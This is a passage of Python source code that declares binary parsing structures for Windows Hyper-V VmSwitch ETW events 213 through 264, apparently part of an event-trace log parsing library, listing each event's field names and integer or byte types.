"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFriendlyNameLen" / Int32ul,
"NicFriendlyName" / Bytes(lambda this: this.NicFriendlyNameLen),
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=213, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_213_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFriendlyNameLen" / Int32ul,
"NicFriendlyName" / Bytes(lambda this: this.NicFriendlyNameLen),
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=214, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_214_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFriendlyNameLen" / Int32ul,
"NicFriendlyName" / Bytes(lambda this: this.NicFriendlyNameLen),
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=215, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_215_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"vPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=216, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_216_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicNameLen" / Int32ul,
"PtNicName" / Bytes(lambda this: this.PtNicNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=217, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_217_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NetEvent" / Int32ul,
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=218, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_218_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"RoutingDomainCount" / Int32ul,
"MultiTenantStackEnabled" / Int8ul,
"Status" / Int32ul,
"Ext1" / Int32ul,
"Ext2" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=219, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_219_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"RoutingDomainCount" / Int32ul,
"MultiTenantStackEnabled" / Int8ul,
"Status" / Int32ul,
"Ext1" / Int32ul,
"Ext2" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=220, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_220_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicStatus" / Int32ul,
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=221, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_221_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ObjectState" / Int32ul,
"NicState" / Int32ul,
"NicPaused" / Int8ul,
"BuffersNotReady" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=222, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_222_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ObjectState" / Int32ul,
"NicState" / Int32ul,
"NicPaused" / Int8ul,
"BuffersNotReady" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=223, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_223_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=224, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_224_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=225, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_225_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"FailReason" / Int32ul,
"Status" / Int32ul,
"Flags" / Int32ul,
"BaseCpuNumber" / Int32ul,
"HashInformation" / Int32ul,
"IndirectionTableSize" / Int32ul,
"IndirectionTableOffset" / Int32ul,
"HashSecretKeySize" / Int32ul,
"HashSecretKeyOffset" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=226, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_226_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"BaseCpuNumber" / Int32ul,
"HashInformation" / Int32ul,
"IndirectionTableSize" / Int32ul,
"IndirectionTableOffset" / Int32ul,
"HashSecretKeySize" / Int32ul,
"HashSecretKeyOffset" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=227, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_227_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DefaultQueueVrssEnabled" / Int8ul,
"DefaultQueueVmmqEnabled" / Int8ul,
"DefaultQueueVrssMaxQueuePairs" / Int32sl,
"DefaultQueueVrssMinQueuePairs" / Int32sl,
"DefaultQueueVrssQueueSchedulingMode" / Int32ul,
"DefaultQueueVrssExcludePrimaryProcessor" / Int8ul,
"DefaultQueueVrssIndependentHostSpreading" / Int8ul,
"FailReason" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=228, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_228_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DefaultQueueVrssEnabled" / Int8ul,
"DefaultQueueVmmqEnabled" / Int8ul,
"DefaultQueueVrssMaxQueuePairs" / Int32sl,
"DefaultQueueVrssMinQueuePairs" / Int32sl,
"DefaultQueueVrssQueueSchedulingMode" / Int32ul,
"DefaultQueueVrssExcludePrimaryProcessor" / Int8ul,
"DefaultQueueVrssIndependentHostSpreading" / Int8ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=229, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_229_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"MemberAdapterNameLen" / Int32ul,
"MemberAdapterName" / Bytes(lambda this: this.MemberAdapterNameLen),
"MemberAdapterFriendlyNameLen" / Int32ul,
"MemberAdapterFriendlyName" / Bytes(lambda this: this.MemberAdapterFriendlyNameLen),
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=230, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_230_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFriendlyNameLen" / Int32ul,
"SwitchFriendlyName" / Bytes(lambda this: this.SwitchFriendlyNameLen),
"NvgreEnabled" / Int8ul,
"VxLanEnabled" / Int8ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=231, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_231_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"MemberAdapterNameLen" / Int32ul,
"MemberAdapterName" / Bytes(lambda this: this.MemberAdapterNameLen),
"MemberAdapterFriendlyNameLen" / Int32ul,
"MemberAdapterFriendlyName" / Bytes(lambda this: this.MemberAdapterFriendlyNameLen),
"TimeDiff" / Int64sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=232, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_232_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=233, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_233_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=234, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_234_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=235, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_235_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=236, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_236_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=237, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_237_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Reason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=238, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_238_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=239, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_239_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=240, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_240_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=241, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_241_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=242, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_242_0(Etw):
pattern = Struct(
"SrcNicNameLen" / Int32ul,
"SrcNicName" / Bytes(lambda this: this.SrcNicNameLen),
"SrcNicFNameLen" / Int32ul,
"SrcNicFName" / Bytes(lambda this: this.SrcNicFNameLen),
"DestNicNameLen" / Int32ul,
"DestNicName" / Bytes(lambda this: this.DestNicNameLen),
"DestNicFNameLen" / Int32ul,
"DestNicFName" / Bytes(lambda this: this.DestNicFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"BufferAddress" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=243, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_243_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"AvailableAddressFilters" / Int32ul,
"RequestedVlanIDs" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=244, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_244_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"AvailableAddressFilters" / Int32ul,
"RequestedVlanIDs" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=245, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_245_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"vPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul,
"DstVPortId" / Int32ul,
"VlanId" / Int32ul,
"MacLength" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacLength)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=246, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_246_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"SrcVPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul,
"DstVPortId" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=247, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_247_0(Etw):
pattern = Struct(
"FilterId" / Int32ul,
"vPortId" / Int32ul,
"Status" / Int32ul,
"VportsSupported" / Int8ul,
"EmbeddedTeaming" / Int8ul,
"NicIndex" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=248, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_248_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=249, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_249_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=250, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_250_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=251, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_251_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"Status" / Int32ul,
"FailureReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=252, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_252_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ProcessorIndex" / Int32ul,
"QueueSizeMBytes" / Int32ul,
"QueueLimitMBytes" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=253, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_253_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"ProcessorIndex" / Int32ul,
"QueueSizeMBytes" / Int32ul,
"QueueLimitMBytes" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=254, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_254_0(Etw):
pattern = Struct(
"FailReason" / Int32ul,
"NetEvent" / Int32ul,
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=255, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_255_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"RdmaWeight" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=256, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_256_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"RdmaWeight" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=257, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_257_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"RdmaWeight" / Int32ul,
"FailReason" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=258, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_258_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=259, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_259_0(Etw):
pattern = Struct(
"NdisOid" / Int32ul,
"OidFailureStatus" / Int32ul,
"FailureMode" / Int32ul,
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PtNicFNameLen" / Int32ul,
"PtNicFName" / Bytes(lambda this: this.PtNicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=260, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_260_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"VmqIndex" / Int32ul,
"RssQueueIndex" / Int16sl,
"NdisStatus" / Int32sl
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=261, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_261_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DropLowResourcesPackets" / Int8ul,
"FailReason" / Int32ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=262, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_262_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DropLowResourcesPackets" / Int8ul,
"Operation" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=263, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_263_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=264, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_264_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
